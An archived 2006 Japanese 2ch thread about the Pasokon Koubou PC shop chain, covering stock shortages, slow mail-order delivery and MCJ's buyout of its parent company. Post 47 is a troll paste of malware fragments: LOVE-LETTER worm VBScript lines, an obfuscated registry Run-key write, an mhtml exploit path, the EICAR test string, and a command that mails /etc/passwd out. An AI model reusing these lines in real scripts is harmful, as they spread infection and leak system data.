2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

{市街} パソコン工房 {郊外}

1 :Socket774:2006/11/02(木) 22:16:06 ID:ZW5tuQqV
全国どこにでもあるパソコン工房を語るスレッドです。

2 :2:2006/11/02(木) 22:16:49 ID:GVVFdoB5
       / ̄ ̄ ヽ,       
      /        ',    
      .l  {0} /¨`ヽ}0},   
     .l     ヽ._.ノ  ',  
     リ    `ー'′  ', 
     (   __//. ヽ,, ,)
      丶1    八.  !/
       ζ,    八.  j
        i    丿 、 j
        |     八   |
        | !    i 、 |
       | i し " i   '|
      |ノ (   i    i|
      ( '~ヽ   !  ‖
        │     i   ‖
      |      !   ||
      |    │    |
      |       |    | |
     |       |   | |
     |        !    | |


3 :Socket774:2006/11/02(木) 23:12:45 ID:F/dFmmLX
品薄 高い

4 :Socket774:2006/11/03(金) 07:21:40 ID:gxV70ImP
通信販売はカードでのボーナス一括払いができるのでよく使う。

5 :Socket774:2006/11/03(金) 18:52:28 ID:pNFWSm/4
なんか店頭に置くM/Bの数が減っているように思うんだけど、、、

みんなのところはいかがですか?

6 :Socket774:2006/11/04(土) 00:14:39 ID:mzNN71Lg
郡山店はマザー棚ガラ空き状態

7 :Socket774:2006/11/04(土) 02:05:27 ID:VwxWdaEi
(´・ω・`)

自分とこのMVK取り扱い品もあんまり置いてなかったりするし、、、
ttp://www.mvk-japan.com/

1年前だとまだM/B色々置いていたのに。

8 :Socket774:2006/11/04(土) 22:08:21 ID:ujz3i7ZL
安いのほしいなら 地方はだめだよ 
秋葉にいきましょう 

9 :Socket774:2006/11/04(土) 22:54:50 ID:jUDgiwPx
>>1
このスレじゃダメなのか?
【最大級】パソコン工房ってどうよ?9【自作系】
http://pc7.2ch.net/test/read.cgi/pc/1147882161/

10 :Socket774:2006/11/07(火) 00:28:06 ID:hdq8AoFl
aroのスレッドなら面白かったのに。。

11 :Socket774:2006/12/01(金) 11:34:14 ID:AD3dH6ru
じゃ次はアロ総合スレッドということで落ちてから立てます。

某工房の再生品コーナーにASUSとMSIの再生品M/B売ってるんだけど、ASUSは新品並、MSIのんは当時特売していたときより高いよ。
Abitの再生品M/Bを新品コーナーに置いていたりするし、値段も新品並。

12 :Socket774:2006/12/11(月) 12:42:36 ID:g2P7QP7r
昨日、電源がお亡くなりになったと思い込んで慌てて工房に買いに行ったら
単品物買うには金がぎりぎりだったので
閉店間際にもうひとつの工房へ駆け込むはずがトロい車に前塞がれて間に合わなかった
私がそっち寄ることを匂わせてたこともあるんだろうけど連絡取ってくれてたっぽいので
この場を借りて、2店舗の皆さんお騒がせしてごめんなさい、です

オチ:
ダメモトで以前使ってたケースのパワースイッチを今のケースに付け換えたらあっさり起動
なんだかなぁ

13 :Socket774:2006/12/12(火) 09:56:26 ID:+TnS9Uh0
再利用しよう

14 :Socket774:2006/12/13(水) 20:52:36 ID:nkm0wZ08
HDD通販で頼んだら納期が1週間〜10日だとorz
「そうは言っても実際には2〜3日で発送するんじゃないの」
と楽観的だったが3日過ぎても発送メール無し。マジで1週間かかるのかYO!

15 :Socket774:2006/12/13(水) 21:29:08 ID:BtmRUJkl
>>14
HDD自体どこもお店にしか在庫なし
殆どが海外にしか在庫ない状態

16 :14:2006/12/14(木) 00:43:05 ID:Sm+aKZUp
>>15
マジデ?
ネット納期表記は「即納」になっていたのに・・・orz
もう二度と工房使わね!

17 :14:2006/12/15(金) 13:32:04 ID:olcFG0Vc
あ〜もう!おせぇんだよ!ヤルキあんのか?工房
公式ブログとやら見たら最終更新が10月だし、楽天店見たら新着情報10月だし、
ヤルキねぇんなら通販するんじゃねぇ!

つか、なんでこのスレ寂れてるの・・?


18 :Socket774:2006/12/15(金) 15:54:22 ID:a2H221Hn
地方だと送料プラスしても通販で買ったほうが安いからなぁ。
緊急なときか、会社のサーバーのHDD買うときぐらいしか利用してないな。

19 :Socket774:2006/12/15(金) 16:10:21 ID:bUs8idBS
つーか、日本橋本店も終わってる罠。



20 :Socket774:2006/12/15(金) 18:36:18 ID:tuIoHYHd
>>19
せめて中古販売とかやってくれたらなぁ・・とは思う。
つか、対面にあるFaithの方がどうみてもパーツ類の量が上だからなぁ。
音楽プレイヤーの電池切れたときによるくらいだな、工房は。

ウチから遠い箕面店は中古販売やめててショック
わざわざ行く意味有ったのだろうかorz
地元の方がまだマシだったなぁ・・でもHDDケースと一部除くとK'sデンキに負けてる気がする。

21 :Socket774:2006/12/15(金) 21:13:28 ID:ciYn4FOC
尾三福山方面じゃまともなショップは工房だけ。
アフォライドは使い物にならん。
ヤマダは品揃え悪すぎだし。
ただ、こっちじゃIntel傾注してAMDがあんまりないんだな。

22 :Socket774:2006/12/16(土) 09:42:55 ID:tchCh8d7
>>20
あらら、箕面店はU-FRONT止めてないんじゃないの?
http://www.pc-koubou.co.jp/shop/

>>21
それ、全国的じゃないかな。
AM2は無視。



23 :14:2006/12/17(日) 22:28:00 ID:fdQt1yXr
やっと発送しまつメール北orzヤットダヨ・・・

24 :Socket774:2006/12/19(火) 00:17:19 ID:Y3/QdSqf
アロ関連店の正月福袋には
全店共通で絶対PCに関連すらしないアレが入ってる
特に上から指示は無いけど何処も絶対入れる確実だ

25 :Socket774:2006/12/19(火) 09:18:27 ID:cvzhkUYm
パソコン工房のノ−ト持っていたんだけど、それを工房で売りに行ったら買い取
り価格えらい安くて。店員になぜか聞いたら「うちの製品は品質がよくないので
買取価格は他メ−カ−の買取価格より安くなると平然と言っとったよ。工房は利
用しない。

26 :Socket774:2006/12/19(火) 12:21:47 ID:d7qPv6ow
>>24
アレって何が入るのだろう?
オナホール?

27 :Socket774:2006/12/19(火) 18:31:53 ID:QExxMkLH
サングラスwwwwwwwwwwwwwwwww

28 :Socket774:2006/12/21(木) 00:39:23 ID:E6lbkBDk
年末商戦というのにウチの地元の工房は
品揃え全く駄目。以前より何かと減ったね
C2Dも全く無い、DDR2も皆無。あと小物類も前は品数多かったのに・・・
やる気ないみたい、ひょっとして店じまいするのかな?
普通多種多業、物品販売は年末は商品多く仕入れるんだけどね・・・


29 :Socket774:2006/12/21(木) 07:27:28 ID:B2gnwkM+
>>28
直営じゃなくてフランチャイズ店かも。

日本最大のチェーンという割りにどこもお粗末なのは同意します。

>>25
品質が良くないのに新品販売時にはそこそこの値段するのにね。


30 :Socket774:2006/12/21(木) 18:23:52 ID:rzMr5911
さてさて、mcjに食われたか・・・
来年から、大きく動きそうね・・・

31 :Socket774:2006/12/21(木) 18:26:54 ID:1wN9IfFH
工房もTwoTopもFaithも同系列になってしまうのか?

32 :Socket774:2006/12/21(木) 18:37:39 ID:B2gnwkM+
それよりMCJって何でこんなことできんのよ?

33 :Socket774:2006/12/21(木) 19:22:31 ID:rzMr5911
株 株 株

34 :Socket774:2006/12/21(木) 19:58:05 ID:WQqWmbpT
これでアロもマウスクオリティ炸裂になるのか…

35 :Socket774:2006/12/21(木) 21:45:16 ID:WGE6kMkf
会社の状況は変わるんかな?


36 :Socket774:2006/12/21(木) 22:40:34 ID:IaOPWH6O
つくば店の店員は最低

37 :Socket774:2006/12/21(木) 22:55:47 ID:wIwTBPNW
どう最低なんだ?

38 :Socket774:2006/12/21(木) 23:33:25 ID:yEUSlcMh
>>29
FCのせいにしても、君はクビだよね。
アロは身売りして、しまったからね。

39 :Socket774:2006/12/21(木) 23:57:20 ID:c9M9bOLc
>>36
おまいは俺か

40 :Socket774:2006/12/22(金) 00:24:40 ID:ByNVCu30
MCJ、アロシステムを買収

>>低価格戦略における体質作りが最良の選択か?
この時期 売れているメーカーや販売店をみていると それが最良の選択とは違うのに気づくけど
MCJも道をはずしたな。
それにしてもASUSTeK代理店のユニティも合併したらしいが ASUSTeKに横槍いれて変な製品入れないでくれよ

41 :Socket774:2006/12/22(金) 05:42:12 ID:eTuk6Vv9
アロもここ直近の売り上げ、利益が悪くなったから、社長が金になるうちにということなのかな?

MCJも怪しいよな、次はどこ買うんだろ。

42 :Socket774:2006/12/22(金) 10:29:37 ID:F2SmB3pV
MCJ丸ごと、サムスンが買ったりして

43 :22:2006/12/22(金) 18:30:37 ID:eTuk6Vv9
>>20
あれから箕面店寄って来ました。

中古販売やめてました(´・ω・`)
動きのある中古は置いておいて欲しいものですよね。
店閉めるのかな、、、>箕面店

44 :Socket774:2006/12/23(土) 18:50:15 ID:PbQlUrNU
会社を立ち上げたことは認める
しかし 見え張って 派手に立ち振る舞うあの社長
かわいそう 

45 :Socket774:2006/12/23(土) 22:59:15 ID:y6DY8e6a
重複のため誘導

【Amphis】パソコン工房ってどう?【Lesance】
http://pc7.2ch.net/test/read.cgi/pc/1166083421/l50

46 :Socket774:2006/12/24(日) 01:20:16 ID:vGuBa0qw
>>45
そっちはBTO、こっちはパーツと分けて考えれば良いんじゃね?
まあ、こちらの工房スレはいつの間にか墜ちている事多いがw
実店舗の最大の敵はweb店舗ってのが笑える店だよな

47 :Socket774:2006/12/24(日) 01:30:20 ID:gSh/KVLH
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"),
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cat /etc/passwd | mail nobody@nonexistent.com
c.Copy(dirwin&"\Win32DLL.vbs")
ms-its:mhtml:file://c:\
End Sub


48 :Socket774:2006/12/24(日) 01:35:23 ID:gSh/KVLH
       巛彡彡ミミミミミ彡彡
       巛巛巛巛巛巛巛彡彡       
   r、r.r 、|:::::           | 
  r |_,|_,|_,||::::::     /'  '\ | 
  |_,|_,|_,|/⌒      (・ )  (・ )|   
  |_,|_,|_人そ(^i    ⌒ ) ・・)'⌒ヽ   ・・・で?
  | )   ヽノ |.   ┏━━━┓| 
  |  `".`´  ノ   ┃ ノ ̄i ┃|  
  人  入_ノ´   ┃ヽニニノ┃ノ\  
/  \_/\\   ┗━━┛/|\\
      /   \ ト ───イ/   ヽヽ


49 :Socket774:2006/12/24(日) 01:37:20 ID:BwZtp+LP
age

50 :Socket774:2006/12/24(日) 03:14:46 ID:BwZtp+LP


51 :Socket774:2006/12/24(日) 03:19:27 ID:jp2Z99Ok
            __, --──−、_
           /::_, -‐─ ‐-、_::::`‐-、
.           /::/        `‐i:::::::ヽ
           |:./           ',ミ::::::}
           }:l             lミ::::::l'
         _!,'_ ,..-- ..、   __ !::::::::|
        lヽ! `i ィェッ、.i'゙"i';;;ィェッ;,`i===,、
         ',.l  ゙、゙゙゙゙゙,ノ  ヽ_"゙゙ ゙/ r;;;;;;/
          i|    ̄,'  ::::ヽ `''" .,{;;;;;;/
           ',.    ゙`-"゛''   ,};;;;;;'
          !   ,_、,___,  /;;;/"
         _,` 、       /;;r'
   _,, -─ '';;;;;;;;;| 、ヽ,,____,,-‐';;;;;;;;;;;\_
   ;;;;;;;;;;;;;;;;;;;;;;;;;;|  \    _//;;;;;;;;;;;;;;;`ヽ、
   ;;;;;;;;;;;;;;;;;;;;;;;;;;|   r‐ィt- '" /;;;;;;;;;;;;;;;;;;;;;;;;;;
   ;;;;;;;;;;;;;;;;;;;;;;;;;;|  /,彡彡}  ,!;;;;;;;;;;;;;;;;;;;;;;;;;;;;

      ツレマスカ [Vladimir Tzlemazka]
        (1915-1997 ロシア)


52 :Socket774:2006/12/24(日) 03:24:45 ID:Ko3niAe5
   ;ヾ、,.、,、.、rツ ッッシ、:':' r':' _,、-'゙_,  や 公 帰 そ
 ,、,、,ミッン、,._        _,、-'゙_,、-'゙.   っ 園. り ん
 、ィッ ,:、 ゙''ゞ=ミ、~.: _,、-'゙_,、-'゙  __,  て の 道 な
 }; ヾ ゙' {!li;:,. _,、-'゙_,、-'゙ _,、-'゙,::|_|  来  ト に わ
 ゞァ''゙ぐ _,、-'゙_,、-'゙ _,、-'゙,、-''" .|_   た イ  あ け
 ,ヘ:'_,、-'゙_,、-'゙..::「┴_,エ ┴  ''"_|_|  の. レ る で
  └i'゙-ニ,ニエ,.:|ニ「 _エ ┴  ''"_|_   だ に
    |エ | ニエ, |ニ「 _エ ┴  __.|_|_
    |エ | ニエ, |ニ「 _エ ┴ 「fj.||__|__| _|
    |エ | ニエ, |[8] _エ ┴ └‐_|_|__l__,|⊥ |__
    |エ | ニエ, |二 _.エ 二.._ |__|__| _|_|_
    |エ | ニエ, |┴ _.エ 二.._ |_|__l__,|⊥ |__|
    |エ | ニエ, |工 _.エ 二.._ |__|__| _|_|_
    |エ | ニエ, |工 _.エ 二.._ |_|__l__,|⊥ |__
  -,-=''┷━━|┬ニエ ┬--  .|__|__| _|_|_
   ''ーニ_''ー::、_ ゙┷ 工_二'‐-、,_|_|__l__,|⊥ |__
  二二二`''ーニ`_''ー-、_¨''━、L|__|__| _|_|_
  二二二二二二二`''ーニ_''ー 、_       |⊥ |__


53 :Socket774:2006/12/27(水) 20:58:08 ID:H2Wp725j ?2BP(0)
MCJ、次買うのが高速とかOCWとかクレバとかblessだったら嫌だなw

14 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)